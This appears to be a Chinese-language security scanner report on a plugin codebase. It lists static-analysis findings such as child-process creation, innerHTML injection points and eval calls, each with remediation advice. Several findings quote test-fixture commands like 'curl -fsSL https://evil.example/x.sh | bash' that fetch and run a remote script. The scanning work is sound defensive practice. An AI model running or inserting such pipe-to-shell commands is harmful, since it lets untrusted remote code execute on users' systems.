低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
benchmark/cases/malicious-remote-download-exec/index.mjsGitHub 1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
256.innerHTML=
规则备注 · 附近存在清洗/转义调用
修复建议使用安全 DOM API,并严格清洗不可信内容。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
261.innerHTML=
规则备注 · 附近存在清洗/转义调用
修复建议使用安全 DOM API,并严格清洗不可信内容。
高HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
26eval(
规则备注 · 出现在字符串或注释中
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
test-fixtures/dsh-malicious/cordis.patch.yml:8GitHub 8curl https://evil.example/x.sh | bash
规则备注 · 命令位于字符串字面量中,执行路径需人工确认
模型研判占位/示例
该文件位于 test-fixtures/dsh-malicious/ 目录,是用于验证扫描规则的测试样例 cordis patch,非真实加载的 bundle 配置。
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
test-fixtures/malicious/install.sh:2GitHub 2curl -fsSL https://evil.example/x.sh | bash
模型研判占位/示例
该文件位于 test-fixtures/malicious/ 目录,是扫描器自测用的恶意样本 fixture,不会被插件本身执行。
修复建议先下载并校验固定哈希,再由用户显式执行。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/scanner.test.mjs:29GitHub 29subprocess.run
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
中HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/scanner.test.mjs:33GitHub 33execFileSync
规则备注 · 命令由运行时变量拼接,需确认输入来源是否可信;位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
9curl|bash
规则备注 · 命令位于字符串字面量中,执行路径需人工确认;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
test/scanner.test.mjs:10GitHub 10curl -fsSL https://evil.example/x.sh | bash
规则备注 · 命令位于字符串字面量中,执行路径需人工确认;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
高HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/scanner.test.mjs:26GitHub 26eval(
规则备注 · 以方法或属性形式出现(如 x.eval),并非全局 eval;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
高HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/scanner.test.mjs:27GitHub 27eval(
规则备注 · 出现在字符串或注释中;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。